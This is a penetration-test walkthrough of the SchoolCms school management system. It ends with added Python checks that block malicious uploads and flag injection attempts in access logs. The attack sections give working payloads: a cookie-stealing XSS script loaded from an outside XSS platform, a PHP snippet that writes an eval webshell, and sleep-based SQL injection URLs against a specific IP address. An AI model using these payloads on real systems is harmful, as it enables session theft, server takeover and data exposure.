Table of contents
SchoolCms Vulnerability Penetration Test
Site configuration --> site settings: file upload point
Theme management ---> theme installation: file upload
SchoolCms Vulnerability Penetration Test
Site homepage:
Information gathering
Look up the IP information and scan
nmap port scan
Information gathering: directory brute-forcing
Scan with Edgeworth
Port scan
From the brute-forced directory listing we find a compressed archive in the directory; we try to download it
Available for download:
After downloading and opening it, we find that it is the source code of the website
1. Weak password brute-forcing
Try to enter the admin backend:
Open the backend login page and brute-force the backend password
First try to log in with the admin account and a random password
The response shows that the account exists but the password is wrong.
Next, capture the login request during the password attempt and send it to Intruder
Use sniper mode: the username is fixed and only the password is brute-forced.
Select the password dictionary
After waiting, observe the results: one response has a different length, so try it as the password
The password is correct; the backend password that logs in successfully is lovelove
2. XSS
Reflected XSS
In the backend, student management, grade management, teacher management, article management and other modules all contain XSS cross-site scripting issues. Taking article management as an example, here is reflected XSS
In article management, I found an XSS that can obtain cookie information
Enter the attack payload in the input box
</tExtArEa>'"><sCRiPt sRC=//xss.yt/nFtJ></sCrIpT>
Check the XSS platform for activity
Copy the corresponding URL and cookie information and check whether you can jump back to the homepage of the website
After successful execution, it jumps to the backend of the website
Stored XSS
Stored XSS
Front-end interface: a pop-up window appears
A pop-up window appears for each corresponding column, so stored XSS is present
3. File upload vulnerability
Site configuration --> site settings: file upload point
Method 1: Upload a file, verify whether it is parsed, write a Trojan horse, and connect directly
Method 2: Create a Trojan horse file, write the Trojan horse into it, and connect
Verify whether there is a file upload vulnerability and obtain a shell on the server
Next, we capture the packet and insert a PHP statement after the picture data to see whether the server parses it
Insert the PHP statement into the picture, then forward the packet
Next, go to the file upload point, right-click to inspect, view the code, find the upload location of the file, and try to access it
Next, we access the link of this uploaded file. It is not hard to see that the file we uploaded has become a .php file
After visiting the link, I found that the PHP statement in this file has been parsed
In the same way, we can replace the PHP test statement with a PHP one-sentence Trojan horse and connect directly with Ant Sword
Capture the packet to get the data, and write the PHP one-sentence Trojan horse into the picture data
Add the one-sentence Trojan horse
In the same way, find the corresponding link of the uploaded file, then visit it
Open HackBar and execute the PHP statement to see whether it is parsed
Connect via Ant Sword
Successfully got the server shell
Method 2: in the file upload directory, create a Trojan horse file and write the Trojan horse into it. The principle is the same, except that after the picture data a PHP statement that creates and writes the file is appended
<?php fwrite(fopen("shell.php","w"),'<?php @eval($_POST["lc"]);?>');?>
The method is the same as above: still capture the packet to get the data, and insert the above statement into the picture data
After forwarding the packet, visit again
We guess that the PHP statement has been executed, so we check
Access the file under the upload path to check whether the file was created successfully.
Try switching to the file we created and access it to see whether the PHP statement we wrote is parsed
Parsed successfully; connect via Godzilla, and the connection succeeds
Successfully got the server shell
All contents under the server directory can be viewed, and a series of operations such as adding, modifying and deleting can be performed!
Theme management ---> theme installation: file upload
Try to upload a zip file
After analysis, a picture and a PHP Trojan horse file are placed together in a folder named shell_Html, which is then packed and compressed.
Next, upload it:
Capture the packet to obtain the request, modify the request, change the type to zip, and then forward the packet
Verify whether the upload succeeded by checking the upload location
According to the source-code analysis, an uploaded archive is decompressed; after decompression the folder is flattened and its files are renamed by splicing: the new file name is XX (taken from the folder name XX_Html) + the original file name. Here the folder is shell_Html, so the files become shellcmd.php and shellshell.png
By observation, the theme upload path is Application\Home\View\. Try to access the file Application\Home\View\shellcmd.php in the newly uploaded folder to see whether it is parsed
The PHP statement was parsed successfully
Use a third-party tool, Ant Sword or Godzilla, to connect and get the shell
Successfully obtained the server shell; the connection succeeded
Go back to the server to verify:
Successfully uploaded and successfully obtained permissions.
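Both upload paths above succeed because the server trusts the client-supplied file name and content. The following server-side checks are an added example written for this write-up (not SchoolCms code); the function names and the rejection messages are assumptions. The image check covers the site-settings upload (a picture stored as .php, or a picture carrying a PHP tag), and the archive check covers the theme zip, whose entries keep their extension through the folder-prefix renaming described above.

```python
import io
import os
import re
import zipfile

# Extensions the web server executes; any entry ending in one is rejected.
EXECUTABLE_EXT = re.compile(r"\.(php\d?|phtml|phar|inc)$", re.IGNORECASE)
# Whitelisted image extensions and the magic bytes each must begin with.
IMAGE_MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_image_upload(filename, data):
    """Site-settings image upload: whitelist the extension, require matching
    magic bytes, and reject a PHP open tag anywhere in the image body."""
    ext = os.path.splitext(filename)[1].lower()
    magic = IMAGE_MAGIC.get(".jpg" if ext == ".jpeg" else ext)
    if magic is None:
        return False, "extension not allowed"
    if not data.startswith(magic):
        return False, "content does not match extension"
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"


def check_theme_zip(data):
    """Theme archive: inspect every entry before extraction into the View
    directory. Reject traversal, absolute paths and executable entries; the
    folder-prefix renaming keeps the extension, so a .php stays executable."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return False, "not a zip file"
    for name in zf.namelist():
        parts = name.replace("\\", "/").split("/")
        if name.startswith(("/", "\\")) or ".." in parts:
            return False, f"unsafe path: {name}"
        if EXECUTABLE_EXT.search(name):
            return False, f"executable entry: {name}"
    return True, "ok"


def make_zip(entries):
    """Build a constructed in-memory archive from {entry_name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()
```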
4. Log Leakage
Through test verification, a log leak was found
URL address:
http://43.143.169.215/Application/Runtime/Logs/Home/23_05_23.log --- the file name follows the date: year_month_day.log
After accessing it, the content is echoed successfully, and it is downloaded
View the downloaded log content
5. SQL Injection
Through testing and observing the results, a SQL injection point was found in the backend
Injection point:
index.php?m=Admin&c=Article&a=SaveInfo
Injection statement:
index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+
Visit:
http://43.143.169.215/index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+
Displayed after a delay:
Capture the packet to see the change:
Normally:
After injection:
The delay succeeds
The second injection point:
http://ip/schoolcms/index.php?m=Admin&c=Article&a=Index
SQL injection also exists here; capture the packet while performing the delete operation and observe its changes
Injection point:
In the request packet of http://ip/schoolcms/index.php?m=Admin&c=Article&a=Delete,
modify the original data in the packet
by adding id[where]=id=1+or+sleep(5)
Perform the delete operation, observe the change in the URL information, capture the packet, modify it, and try SQL injection.
Under normal circumstances:
After injection:
The delay in sleep() can be set to any value.
After modification, forward the packet and observe the change
The delay succeeds
After decoding:
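Both the log leak in section 4 and the two time-based injections in section 5 leave a clear trace in the web server's access log: a 200 response for a path under Application/Runtime/Logs, and query keys in the array form id[where] carrying sleep(). The detector below is an added example for this write-up, not part of SchoolCms or the original post; the log lines are constructed to mirror the requests shown above, and the regexes and function names are assumptions. The Delete injection is sent in the POST body, which a standard access log does not record, so that line is only caught when the same parameter appears in the query string.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample access-log lines modelled on the requests in this report.
SAMPLE_LOG = """\
10.0.0.5 - - [23/May/2023:10:01:02 +0800] "GET /index.php?m=Admin&c=Article&a=SaveInfo&id=3 HTTP/1.1" 200 512
10.0.0.5 - - [23/May/2023:10:01:09 +0800] "GET /index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3%20and%20sleep(10)--+ HTTP/1.1" 200 512
10.0.0.5 - - [23/May/2023:10:02:30 +0800] "GET /Application/Runtime/Logs/Home/23_05_23.log HTTP/1.1" 200 40211
10.0.0.5 - - [23/May/2023:10:03:11 +0800] "POST /index.php?m=Admin&c=Article&a=Delete HTTP/1.1" 200 88
"""

# Combined-format request line: client, timestamp, method, target, status, size.
REQ = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)')
# Array-form keys that let a query parameter reach the ORM's where/exp clause.
ARRAY_KEY = re.compile(r"^\w+\[(where|exp|bind|table|having|order|group)\]$", re.I)
SQL_HINT = re.compile(r"\b(sleep|benchmark)\s*\(|\b(or|and)\b\s+\d+=\d+|--\s*$", re.I)
LOG_PATH = re.compile(r"^/Application/Runtime/Logs/", re.I)


def inspect_line(line):
    """Return the list of reasons this access-log line looks like abuse."""
    m = REQ.match(line)
    if not m:
        return []
    _src, _ts, _method, target, status, _size = m.groups()
    path, query = target.split("?", 1) if "?" in target else (target, "")
    reasons = []
    if LOG_PATH.match(path) and status == "200":
        reasons.append("framework log file served")
    for key, value in parse_qsl(query, keep_blank_values=True):
        if ARRAY_KEY.match(key):
            reasons.append(f"array-form query key {key}")
        if SQL_HINT.search(unquote_plus(value)):
            reasons.append(f"SQL keyword in {key}")
    return reasons


def scan_log(text):
    """Map line number -> reasons for every suspicious line in the log text."""
    hits = {}
    for number, line in enumerate(text.splitlines(), 1):
        reasons = inspect_line(line)
        if reasons:
            hits[number] = reasons
    return hits
```

Blocking direct access to Application/Runtime/Logs in the web server configuration removes the first finding entirely; the query-key check is a detection aid, not a substitute for the application rejecting array-form parameters.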
If the article is inappropriate, criticism and correction are welcome!